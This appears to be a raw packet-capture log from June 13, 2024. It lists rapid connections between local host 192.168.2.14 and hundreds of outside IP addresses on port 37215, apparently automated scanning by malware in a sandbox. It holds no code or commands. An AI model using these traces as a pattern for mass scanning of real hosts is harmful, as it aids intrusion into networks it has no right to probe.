                                                        Jun 13, 2024 21:31:59.183996916 CEST3721545240197.166.240.196192.168.2.14
                                                        Jun 13, 2024 21:31:59.184005022 CEST3482637215192.168.2.1441.62.52.162
                                                        Jun 13, 2024 21:31:59.184026003 CEST5306237215192.168.2.14197.251.142.134
                                                        Jun 13, 2024 21:31:59.184031963 CEST4524037215192.168.2.14197.166.240.196
                                                        Jun 13, 2024 21:31:59.184081078 CEST3721553702197.39.96.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.184094906 CEST3721553958197.39.96.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.184109926 CEST372155206041.22.200.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.184122086 CEST372155206041.22.200.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.184134007 CEST372155231641.22.200.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.184134960 CEST5395837215192.168.2.14197.39.96.114
                                                        Jun 13, 2024 21:31:59.184154034 CEST3721557092197.59.241.93192.168.2.14
                                                        Jun 13, 2024 21:31:59.184156895 CEST5395837215192.168.2.14197.39.96.114
                                                        Jun 13, 2024 21:31:59.184164047 CEST5231637215192.168.2.1441.22.200.117
                                                        Jun 13, 2024 21:31:59.184179068 CEST3743837215192.168.2.14197.218.101.123
                                                        Jun 13, 2024 21:31:59.184192896 CEST5231637215192.168.2.1441.22.200.117
                                                        Jun 13, 2024 21:31:59.184199095 CEST3618037215192.168.2.14197.163.130.107
                                                        Jun 13, 2024 21:31:59.184297085 CEST372154175841.134.28.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.184344053 CEST4175837215192.168.2.1441.134.28.73
                                                        Jun 13, 2024 21:31:59.184381008 CEST3721557092197.59.241.93192.168.2.14
                                                        Jun 13, 2024 21:31:59.184396029 CEST3721557348197.59.241.93192.168.2.14
                                                        Jun 13, 2024 21:31:59.184420109 CEST372153575241.225.65.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.184432983 CEST5734837215192.168.2.14197.59.241.93
                                                        Jun 13, 2024 21:31:59.184449911 CEST3575237215192.168.2.1441.225.65.168
                                                        Jun 13, 2024 21:31:59.184452057 CEST5734837215192.168.2.14197.59.241.93
                                                        Jun 13, 2024 21:31:59.184462070 CEST3721558158156.116.143.128192.168.2.14
                                                        Jun 13, 2024 21:31:59.184470892 CEST4354637215192.168.2.1441.55.174.73
                                                        Jun 13, 2024 21:31:59.184473991 CEST3721547024197.127.43.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.184504986 CEST3721558158156.116.143.128192.168.2.14
                                                        Jun 13, 2024 21:31:59.184506893 CEST4702437215192.168.2.14197.127.43.8
                                                        Jun 13, 2024 21:31:59.184519053 CEST3721558414156.116.143.128192.168.2.14
                                                        Jun 13, 2024 21:31:59.184531927 CEST3721560080197.49.72.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.184544086 CEST3721560080197.49.72.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.184556961 CEST5841437215192.168.2.14156.116.143.128
                                                        Jun 13, 2024 21:31:59.184557915 CEST3721558130197.8.72.118192.168.2.14
                                                        Jun 13, 2024 21:31:59.184565067 CEST5841437215192.168.2.14156.116.143.128
                                                        Jun 13, 2024 21:31:59.184575081 CEST372154752841.116.41.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.184590101 CEST5813037215192.168.2.14197.8.72.118
                                                        Jun 13, 2024 21:31:59.184590101 CEST3418837215192.168.2.1441.30.13.4
                                                        Jun 13, 2024 21:31:59.184648037 CEST372154752841.116.41.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.184660912 CEST3721560336197.49.72.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.184674025 CEST3721536048156.126.25.234192.168.2.14
                                                        Jun 13, 2024 21:31:59.184685946 CEST3721536048156.126.25.234192.168.2.14
                                                        Jun 13, 2024 21:31:59.184699059 CEST372154778441.116.41.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.184716940 CEST6033637215192.168.2.14197.49.72.102
                                                        Jun 13, 2024 21:31:59.184716940 CEST6033637215192.168.2.14197.49.72.102
                                                        Jun 13, 2024 21:31:59.184722900 CEST3721536304156.126.25.234192.168.2.14
                                                        Jun 13, 2024 21:31:59.184736013 CEST3721558710156.199.116.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.184741974 CEST4178037215192.168.2.14197.155.238.189
                                                        Jun 13, 2024 21:31:59.184745073 CEST4778437215192.168.2.1441.116.41.50
                                                        Jun 13, 2024 21:31:59.184747934 CEST3721558874197.82.79.222192.168.2.14
                                                        Jun 13, 2024 21:31:59.184762001 CEST3630437215192.168.2.14156.126.25.234
                                                        Jun 13, 2024 21:31:59.184779882 CEST4407037215192.168.2.1441.74.74.126
                                                        Jun 13, 2024 21:31:59.184779882 CEST5887437215192.168.2.14197.82.79.222
                                                        Jun 13, 2024 21:31:59.184783936 CEST4778437215192.168.2.1441.116.41.50
                                                        Jun 13, 2024 21:31:59.184794903 CEST3630437215192.168.2.14156.126.25.234
                                                        Jun 13, 2024 21:31:59.184814930 CEST3611837215192.168.2.14197.212.142.4
                                                        Jun 13, 2024 21:31:59.184856892 CEST3721558710156.199.116.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.184870958 CEST3721545166197.79.223.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.184883118 CEST372154734241.152.29.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.184895039 CEST372154734241.152.29.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.184906960 CEST4516637215192.168.2.14197.79.223.191
                                                        Jun 13, 2024 21:31:59.184906960 CEST3721558966156.199.116.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.184921026 CEST372154759841.152.29.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.184933901 CEST3721556846156.228.20.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.184946060 CEST372156017441.211.73.143192.168.2.14
                                                        Jun 13, 2024 21:31:59.184953928 CEST4759837215192.168.2.1441.152.29.217
                                                        Jun 13, 2024 21:31:59.184951067 CEST5896637215192.168.2.14156.199.116.168
                                                        Jun 13, 2024 21:31:59.184978008 CEST6017437215192.168.2.1441.211.73.143
                                                        Jun 13, 2024 21:31:59.184981108 CEST4759837215192.168.2.1441.152.29.217
                                                        Jun 13, 2024 21:31:59.184983969 CEST5896637215192.168.2.14156.199.116.168
                                                        Jun 13, 2024 21:31:59.184998035 CEST4011637215192.168.2.14197.207.130.124
                                                        Jun 13, 2024 21:31:59.185000896 CEST6083237215192.168.2.14197.216.251.19
                                                        Jun 13, 2024 21:31:59.185009956 CEST3721556846156.228.20.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.185023069 CEST3721557102156.228.20.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.185049057 CEST372155134841.86.228.153192.168.2.14
                                                        Jun 13, 2024 21:31:59.185064077 CEST372155109241.86.228.153192.168.2.14
                                                        Jun 13, 2024 21:31:59.185080051 CEST5710237215192.168.2.14156.228.20.155
                                                        Jun 13, 2024 21:31:59.185080051 CEST3721553312156.51.67.83192.168.2.14
                                                        Jun 13, 2024 21:31:59.185086966 CEST5134837215192.168.2.1441.86.228.153
                                                        Jun 13, 2024 21:31:59.185087919 CEST5710237215192.168.2.14156.228.20.155
                                                        Jun 13, 2024 21:31:59.185095072 CEST372155109241.86.228.153192.168.2.14
                                                        Jun 13, 2024 21:31:59.185110092 CEST372154201441.134.28.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.185118914 CEST5266237215192.168.2.14156.34.21.252
                                                        Jun 13, 2024 21:31:59.185118914 CEST5331237215192.168.2.14156.51.67.83
                                                        Jun 13, 2024 21:31:59.185133934 CEST372154515841.128.20.245192.168.2.14
                                                        Jun 13, 2024 21:31:59.185137033 CEST5134837215192.168.2.1441.86.228.153
                                                        Jun 13, 2024 21:31:59.185144901 CEST4201437215192.168.2.1441.134.28.73
                                                        Jun 13, 2024 21:31:59.185148001 CEST372154515841.128.20.245192.168.2.14
                                                        Jun 13, 2024 21:31:59.185148954 CEST5333637215192.168.2.1441.219.126.242
                                                        Jun 13, 2024 21:31:59.185161114 CEST372154175841.134.28.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.185173035 CEST372154175841.134.28.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.185173988 CEST4201437215192.168.2.1441.134.28.73
                                                        Jun 13, 2024 21:31:59.185185909 CEST5092437215192.168.2.1441.167.6.76
                                                        Jun 13, 2024 21:31:59.185185909 CEST372154541441.128.20.245192.168.2.14
                                                        Jun 13, 2024 21:31:59.185199022 CEST3721540222156.46.236.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.185214996 CEST3721545240197.166.240.196192.168.2.14
                                                        Jun 13, 2024 21:31:59.185233116 CEST4541437215192.168.2.1441.128.20.245
                                                        Jun 13, 2024 21:31:59.185236931 CEST4022237215192.168.2.14156.46.236.126
                                                        Jun 13, 2024 21:31:59.185241938 CEST3721545240197.166.240.196192.168.2.14
                                                        Jun 13, 2024 21:31:59.185261011 CEST5238037215192.168.2.14156.70.115.159
                                                        Jun 13, 2024 21:31:59.185267925 CEST3721545496197.166.240.196192.168.2.14
                                                        Jun 13, 2024 21:31:59.185281038 CEST372153575241.225.65.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.185292006 CEST372153575241.225.65.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.185305119 CEST372153600841.225.65.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.185312986 CEST4549637215192.168.2.14197.166.240.196
                                                        Jun 13, 2024 21:31:59.185317993 CEST3721547024197.127.43.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.185326099 CEST4549637215192.168.2.14197.166.240.196
                                                        Jun 13, 2024 21:31:59.185343027 CEST3600837215192.168.2.1441.225.65.168
                                                        Jun 13, 2024 21:31:59.185343981 CEST4541437215192.168.2.1441.128.20.245
                                                        Jun 13, 2024 21:31:59.185347080 CEST6067437215192.168.2.1441.78.199.140
                                                        Jun 13, 2024 21:31:59.185357094 CEST3600837215192.168.2.1441.225.65.168
                                                        Jun 13, 2024 21:31:59.185364008 CEST3721547024197.127.43.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.185369015 CEST5761637215192.168.2.14156.87.247.69
                                                        Jun 13, 2024 21:31:59.185379028 CEST372154966841.185.24.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.185400009 CEST3721547280197.127.43.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.185412884 CEST3721558130197.8.72.118192.168.2.14
                                                        Jun 13, 2024 21:31:59.185425043 CEST3721558130197.8.72.118192.168.2.14
                                                        Jun 13, 2024 21:31:59.185431004 CEST4966837215192.168.2.1441.185.24.48
                                                        Jun 13, 2024 21:31:59.185442924 CEST4728037215192.168.2.14197.127.43.8
                                                        Jun 13, 2024 21:31:59.185446024 CEST3721558386197.8.72.118192.168.2.14
                                                        Jun 13, 2024 21:31:59.185467005 CEST4728037215192.168.2.14197.127.43.8
                                                        Jun 13, 2024 21:31:59.185472012 CEST3309037215192.168.2.1441.2.55.158
                                                        Jun 13, 2024 21:31:59.185483932 CEST3721558874197.82.79.222192.168.2.14
                                                        Jun 13, 2024 21:31:59.185493946 CEST5838637215192.168.2.14197.8.72.118
                                                        Jun 13, 2024 21:31:59.185493946 CEST5838637215192.168.2.14197.8.72.118
                                                        Jun 13, 2024 21:31:59.185513973 CEST6066037215192.168.2.14156.218.4.34
                                                        Jun 13, 2024 21:31:59.185570002 CEST3721552638156.87.162.197192.168.2.14
                                                        Jun 13, 2024 21:31:59.185592890 CEST3721558874197.82.79.222192.168.2.14
                                                        Jun 13, 2024 21:31:59.185606003 CEST3721559130197.82.79.222192.168.2.14
                                                        Jun 13, 2024 21:31:59.185609102 CEST5263837215192.168.2.14156.87.162.197
                                                        Jun 13, 2024 21:31:59.185628891 CEST3721545166197.79.223.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.185657024 CEST5913037215192.168.2.14197.82.79.222
                                                        Jun 13, 2024 21:31:59.185657024 CEST5913037215192.168.2.14197.82.79.222
                                                        Jun 13, 2024 21:31:59.185666084 CEST3721545166197.79.223.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.185671091 CEST4791237215192.168.2.14197.67.9.14
                                                        Jun 13, 2024 21:31:59.185679913 CEST3721558356197.156.227.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.185723066 CEST5835637215192.168.2.14197.156.227.155
                                                        Jun 13, 2024 21:31:59.185739040 CEST3721545422197.79.223.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.185751915 CEST3721559406156.113.81.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.185765028 CEST3721553312156.51.67.83192.168.2.14
                                                        Jun 13, 2024 21:31:59.185782909 CEST4542237215192.168.2.14197.79.223.191
                                                        Jun 13, 2024 21:31:59.185786963 CEST3721553312156.51.67.83192.168.2.14
                                                        Jun 13, 2024 21:31:59.185792923 CEST5940637215192.168.2.14156.113.81.8
                                                        Jun 13, 2024 21:31:59.185807943 CEST4542237215192.168.2.14197.79.223.191
                                                        Jun 13, 2024 21:31:59.185825109 CEST3541637215192.168.2.1441.140.121.217
                                                        Jun 13, 2024 21:31:59.185858011 CEST372156017441.211.73.143192.168.2.14
                                                        Jun 13, 2024 21:31:59.185935020 CEST372156043041.211.73.143192.168.2.14
                                                        Jun 13, 2024 21:31:59.185947895 CEST372156017441.211.73.143192.168.2.14
                                                        Jun 13, 2024 21:31:59.185960054 CEST3721553568156.51.67.83192.168.2.14
                                                        Jun 13, 2024 21:31:59.185977936 CEST6043037215192.168.2.1441.211.73.143
                                                        Jun 13, 2024 21:31:59.185990095 CEST6043037215192.168.2.1441.211.73.143
                                                        Jun 13, 2024 21:31:59.185996056 CEST5479437215192.168.2.1441.236.174.219
                                                        Jun 13, 2024 21:31:59.186002016 CEST5356837215192.168.2.14156.51.67.83
                                                        Jun 13, 2024 21:31:59.186026096 CEST5356837215192.168.2.14156.51.67.83
                                                        Jun 13, 2024 21:31:59.186032057 CEST3513237215192.168.2.14156.249.24.102
                                                        Jun 13, 2024 21:31:59.186043978 CEST3721558356197.156.227.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.186070919 CEST3721558612197.156.227.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.186084032 CEST3721558356197.156.227.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.186094999 CEST372154966841.185.24.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.186106920 CEST3721557342156.43.161.30192.168.2.14
                                                        Jun 13, 2024 21:31:59.186116934 CEST5861237215192.168.2.14197.156.227.155
                                                        Jun 13, 2024 21:31:59.186122894 CEST5861237215192.168.2.14197.156.227.155
                                                        Jun 13, 2024 21:31:59.186147928 CEST5734237215192.168.2.14156.43.161.30
                                                        Jun 13, 2024 21:31:59.186150074 CEST3764437215192.168.2.1441.98.48.97
                                                        Jun 13, 2024 21:31:59.186419010 CEST372154966841.185.24.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.186431885 CEST3721540222156.46.236.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.186444044 CEST372154992441.185.24.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.186456919 CEST3721540222156.46.236.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.186470032 CEST3721540478156.46.236.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.186485052 CEST372154003441.197.76.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.186501026 CEST4992437215192.168.2.1441.185.24.48
                                                        Jun 13, 2024 21:31:59.186501026 CEST4992437215192.168.2.1441.185.24.48
                                                        Jun 13, 2024 21:31:59.186508894 CEST4239637215192.168.2.1441.172.177.215
                                                        Jun 13, 2024 21:31:59.186511993 CEST4003437215192.168.2.1441.197.76.241
                                                        Jun 13, 2024 21:31:59.186546087 CEST4865237215192.168.2.14156.51.238.240
                                                        Jun 13, 2024 21:31:59.186548948 CEST4047837215192.168.2.14156.46.236.126
                                                        Jun 13, 2024 21:31:59.186548948 CEST4047837215192.168.2.14156.46.236.126
                                                        Jun 13, 2024 21:31:59.186556101 CEST3721559406156.113.81.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.186867952 CEST3721559406156.113.81.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.186881065 CEST3721552638156.87.162.197192.168.2.14
                                                        Jun 13, 2024 21:31:59.186893940 CEST3721559662156.113.81.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.186918020 CEST3721543940156.139.143.212192.168.2.14
                                                        Jun 13, 2024 21:31:59.186930895 CEST3721552638156.87.162.197192.168.2.14
                                                        Jun 13, 2024 21:31:59.186944008 CEST3721552894156.87.162.197192.168.2.14
                                                        Jun 13, 2024 21:31:59.186958075 CEST4394037215192.168.2.14156.139.143.212
                                                        Jun 13, 2024 21:31:59.186980009 CEST5289437215192.168.2.14156.87.162.197
                                                        Jun 13, 2024 21:31:59.186981916 CEST4365037215192.168.2.14156.247.65.190
                                                        Jun 13, 2024 21:31:59.187000036 CEST5289437215192.168.2.14156.87.162.197
                                                        Jun 13, 2024 21:31:59.187015057 CEST5679837215192.168.2.14156.192.228.40
                                                        Jun 13, 2024 21:31:59.187031031 CEST3721534284197.3.237.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.187031031 CEST5966237215192.168.2.14156.113.81.8
                                                        Jun 13, 2024 21:31:59.187031031 CEST5966237215192.168.2.14156.113.81.8
                                                        Jun 13, 2024 21:31:59.187077045 CEST3428437215192.168.2.14197.3.237.232
                                                        Jun 13, 2024 21:31:59.187248945 CEST372154003441.197.76.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.187263966 CEST3721550472197.68.100.216192.168.2.14
                                                        Jun 13, 2024 21:31:59.187274933 CEST372154003441.197.76.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.187289000 CEST372154029041.197.76.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.187298059 CEST5047237215192.168.2.14197.68.100.216
                                                        Jun 13, 2024 21:31:59.187300920 CEST3721557342156.43.161.30192.168.2.14
                                                        Jun 13, 2024 21:31:59.187325954 CEST3721557342156.43.161.30192.168.2.14
                                                        Jun 13, 2024 21:31:59.187334061 CEST4029037215192.168.2.1441.197.76.241
                                                        Jun 13, 2024 21:31:59.187341928 CEST3721557598156.43.161.30192.168.2.14
                                                        Jun 13, 2024 21:31:59.187355995 CEST4029037215192.168.2.1441.197.76.241
                                                        Jun 13, 2024 21:31:59.187371969 CEST372154912241.0.221.87192.168.2.14
                                                        Jun 13, 2024 21:31:59.187376976 CEST5759837215192.168.2.14156.43.161.30
                                                        Jun 13, 2024 21:31:59.187380075 CEST5922237215192.168.2.1441.181.213.184
                                                        Jun 13, 2024 21:31:59.187383890 CEST3721543940156.139.143.212192.168.2.14
                                                        Jun 13, 2024 21:31:59.187396049 CEST3721540546156.116.142.15192.168.2.14
                                                        Jun 13, 2024 21:31:59.187398911 CEST5759837215192.168.2.14156.43.161.30
                                                        Jun 13, 2024 21:31:59.187402010 CEST4912237215192.168.2.1441.0.221.87
                                                        Jun 13, 2024 21:31:59.187412977 CEST4839037215192.168.2.14156.132.151.48
                                                        Jun 13, 2024 21:31:59.187422991 CEST4054637215192.168.2.14156.116.142.15
                                                        Jun 13, 2024 21:31:59.187448025 CEST3721543940156.139.143.212192.168.2.14
                                                        Jun 13, 2024 21:31:59.187460899 CEST3721544196156.139.143.212192.168.2.14
                                                        Jun 13, 2024 21:31:59.187491894 CEST3721534284197.3.237.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.187494040 CEST4419637215192.168.2.14156.139.143.212
                                                        Jun 13, 2024 21:31:59.187505007 CEST3721538486156.127.173.223192.168.2.14
                                                        Jun 13, 2024 21:31:59.187516928 CEST4419637215192.168.2.14156.139.143.212
                                                        Jun 13, 2024 21:31:59.187531948 CEST3562037215192.168.2.14197.74.195.55
                                                        Jun 13, 2024 21:31:59.187536955 CEST3721534284197.3.237.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.187546968 CEST3848637215192.168.2.14156.127.173.223
                                                        Jun 13, 2024 21:31:59.187551022 CEST3721534540197.3.237.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.187565088 CEST3721550472197.68.100.216192.168.2.14
                                                        Jun 13, 2024 21:31:59.187577009 CEST3721535752197.209.113.82192.168.2.14
                                                        Jun 13, 2024 21:31:59.187612057 CEST3454037215192.168.2.14197.3.237.232
                                                        Jun 13, 2024 21:31:59.187612057 CEST3575237215192.168.2.14197.209.113.82
                                                        Jun 13, 2024 21:31:59.187612057 CEST3454037215192.168.2.14197.3.237.232
                                                        Jun 13, 2024 21:31:59.187623024 CEST3438837215192.168.2.1441.8.46.108
                                                        Jun 13, 2024 21:31:59.187664032 CEST3721550472197.68.100.216192.168.2.14
                                                        Jun 13, 2024 21:31:59.187690973 CEST3721550728197.68.100.216192.168.2.14
                                                        Jun 13, 2024 21:31:59.187728882 CEST3721546326156.230.224.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.187735081 CEST5072837215192.168.2.14197.68.100.216
                                                        Jun 13, 2024 21:31:59.187741041 CEST3721538486156.127.173.223192.168.2.14
                                                        Jun 13, 2024 21:31:59.187747955 CEST5072837215192.168.2.14197.68.100.216
                                                        Jun 13, 2024 21:31:59.187767029 CEST3299437215192.168.2.14156.178.175.24
                                                        Jun 13, 2024 21:31:59.187767982 CEST4632637215192.168.2.14156.230.224.2
                                                        Jun 13, 2024 21:31:59.187930107 CEST372154912241.0.221.87192.168.2.14
                                                        Jun 13, 2024 21:31:59.187943935 CEST3721538742156.127.173.223192.168.2.14
                                                        Jun 13, 2024 21:31:59.187988043 CEST3721538486156.127.173.223192.168.2.14
                                                        Jun 13, 2024 21:31:59.188002110 CEST372154912241.0.221.87192.168.2.14
                                                        Jun 13, 2024 21:31:59.188004017 CEST6036637215192.168.2.14156.58.220.239
                                                        Jun 13, 2024 21:31:59.188014030 CEST3721557770197.82.75.9192.168.2.14
                                                        Jun 13, 2024 21:31:59.188021898 CEST3874237215192.168.2.14156.127.173.223
                                                        Jun 13, 2024 21:31:59.188021898 CEST3874237215192.168.2.14156.127.173.223
                                                        Jun 13, 2024 21:31:59.188026905 CEST372154937841.0.221.87192.168.2.14
                                                        Jun 13, 2024 21:31:59.188040018 CEST3721540802156.116.142.15192.168.2.14
                                                        Jun 13, 2024 21:31:59.188052893 CEST3721540546156.116.142.15192.168.2.14
                                                        Jun 13, 2024 21:31:59.188055038 CEST5777037215192.168.2.14197.82.75.9
                                                        Jun 13, 2024 21:31:59.188060045 CEST4937837215192.168.2.1441.0.221.87
                                                        Jun 13, 2024 21:31:59.188074112 CEST4080237215192.168.2.14156.116.142.15
                                                        Jun 13, 2024 21:31:59.188076019 CEST4937837215192.168.2.1441.0.221.87
                                                        Jun 13, 2024 21:31:59.188096046 CEST5186237215192.168.2.14197.36.55.1
                                                        Jun 13, 2024 21:31:59.188103914 CEST3721542556197.51.77.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.188112020 CEST4080237215192.168.2.14156.116.142.15
                                                        Jun 13, 2024 21:31:59.188117027 CEST3721540546156.116.142.15192.168.2.14
                                                        Jun 13, 2024 21:31:59.188127041 CEST3890637215192.168.2.14197.40.176.8
                                                        Jun 13, 2024 21:31:59.188131094 CEST3721535752197.209.113.82192.168.2.14
                                                        Jun 13, 2024 21:31:59.188143969 CEST3721535752197.209.113.82192.168.2.14
                                                        Jun 13, 2024 21:31:59.188199043 CEST4255637215192.168.2.14197.51.77.50
                                                        Jun 13, 2024 21:31:59.188254118 CEST3721546326156.230.224.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.188277006 CEST3721546326156.230.224.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.188292980 CEST3721546582156.230.224.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.188304901 CEST3721555566156.102.62.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.188318968 CEST3721536008197.209.113.82192.168.2.14
                                                        Jun 13, 2024 21:31:59.188330889 CEST3721542556197.51.77.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.188335896 CEST5556637215192.168.2.14156.102.62.53
                                                        Jun 13, 2024 21:31:59.188343048 CEST3721542556197.51.77.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.188358068 CEST372154567641.160.194.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.188358068 CEST4658237215192.168.2.14156.230.224.2
                                                        Jun 13, 2024 21:31:59.188358068 CEST4658237215192.168.2.14156.230.224.2
                                                        Jun 13, 2024 21:31:59.188370943 CEST3600837215192.168.2.14197.209.113.82
                                                        Jun 13, 2024 21:31:59.188370943 CEST4035237215192.168.2.14197.180.35.86
                                                        Jun 13, 2024 21:31:59.188381910 CEST3721543852156.254.199.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.188395977 CEST3721557770197.82.75.9192.168.2.14
                                                        Jun 13, 2024 21:31:59.188400030 CEST3398837215192.168.2.14156.141.134.112
                                                        Jun 13, 2024 21:31:59.188407898 CEST3600837215192.168.2.14197.209.113.82
                                                        Jun 13, 2024 21:31:59.188409090 CEST3721557770197.82.75.9192.168.2.14
                                                        Jun 13, 2024 21:31:59.188416004 CEST4385237215192.168.2.14156.254.199.241
                                                        Jun 13, 2024 21:31:59.188446045 CEST3721542812197.51.77.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.188460112 CEST372154593241.160.194.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.188472033 CEST3721555566156.102.62.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.188504934 CEST4281237215192.168.2.14197.51.77.50
                                                        Jun 13, 2024 21:31:59.188504934 CEST4281237215192.168.2.14197.51.77.50
                                                        Jun 13, 2024 21:31:59.188504934 CEST4593237215192.168.2.1441.160.194.101
                                                        Jun 13, 2024 21:31:59.188512087 CEST5697037215192.168.2.14156.96.157.43
                                                        Jun 13, 2024 21:31:59.188512087 CEST3721558026197.82.75.9192.168.2.14
                                                        Jun 13, 2024 21:31:59.188530922 CEST3721555566156.102.62.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.188536882 CEST4593237215192.168.2.1441.160.194.101
                                                        Jun 13, 2024 21:31:59.188543081 CEST372154608441.168.245.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.188545942 CEST5827837215192.168.2.1441.187.7.24
                                                        Jun 13, 2024 21:31:59.188560009 CEST5802637215192.168.2.14197.82.75.9
                                                        Jun 13, 2024 21:31:59.188569069 CEST3721555822156.102.62.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.188577890 CEST4608437215192.168.2.1441.168.245.248
                                                        Jun 13, 2024 21:31:59.188580990 CEST5022437215192.168.2.14197.187.191.53
                                                        Jun 13, 2024 21:31:59.188581944 CEST5802637215192.168.2.14197.82.75.9
                                                        Jun 13, 2024 21:31:59.188582897 CEST3721543852156.254.199.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.188596010 CEST3721543852156.254.199.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.188616991 CEST5582237215192.168.2.14156.102.62.53
                                                        Jun 13, 2024 21:31:59.188636065 CEST5582237215192.168.2.14156.102.62.53
                                                        Jun 13, 2024 21:31:59.188642979 CEST4071037215192.168.2.14197.142.93.6
                                                        Jun 13, 2024 21:31:59.188695908 CEST3721544108156.254.199.241192.168.2.14
                                                        Jun 13, 2024 21:31:59.188709974 CEST372154608441.168.245.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.188721895 CEST372154608441.168.245.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.188735008 CEST372154634041.168.245.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.188735962 CEST4410837215192.168.2.14156.254.199.241
                                                        Jun 13, 2024 21:31:59.188746929 CEST3721542306197.222.41.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.188751936 CEST4410837215192.168.2.14156.254.199.241
                                                        Jun 13, 2024 21:31:59.188770056 CEST5442637215192.168.2.14156.207.60.191
                                                        Jun 13, 2024 21:31:59.188770056 CEST4634037215192.168.2.1441.168.245.248
                                                        Jun 13, 2024 21:31:59.188791990 CEST4634037215192.168.2.1441.168.245.248
                                                        Jun 13, 2024 21:31:59.188806057 CEST5989237215192.168.2.1441.1.47.57
                                                        Jun 13, 2024 21:31:59.188822985 CEST372154567641.160.194.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.188870907 CEST372156020041.23.35.41192.168.2.14
                                                        Jun 13, 2024 21:31:59.188885927 CEST3721542562197.222.41.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.188920021 CEST3721542306197.222.41.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.188934088 CEST372156045641.23.35.41192.168.2.14
                                                        Jun 13, 2024 21:31:59.188941002 CEST4256237215192.168.2.14197.222.41.238
                                                        Jun 13, 2024 21:31:59.188941002 CEST4256237215192.168.2.14197.222.41.238
                                                        Jun 13, 2024 21:31:59.188955069 CEST3760637215192.168.2.1441.231.104.194
                                                        Jun 13, 2024 21:31:59.188956976 CEST3721536920197.175.159.181192.168.2.14
                                                        Jun 13, 2024 21:31:59.188957930 CEST6045637215192.168.2.1441.23.35.41
                                                        Jun 13, 2024 21:31:59.188977003 CEST6045637215192.168.2.1441.23.35.41
                                                        Jun 13, 2024 21:31:59.188987017 CEST3692037215192.168.2.14156.77.39.5
                                                        Jun 13, 2024 21:31:59.189088106 CEST3721537176197.175.159.181192.168.2.14
                                                        Jun 13, 2024 21:31:59.189100981 CEST3721559254156.137.45.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.189112902 CEST372156020041.23.35.41192.168.2.14
                                                        Jun 13, 2024 21:31:59.189131021 CEST3717637215192.168.2.14197.175.159.181
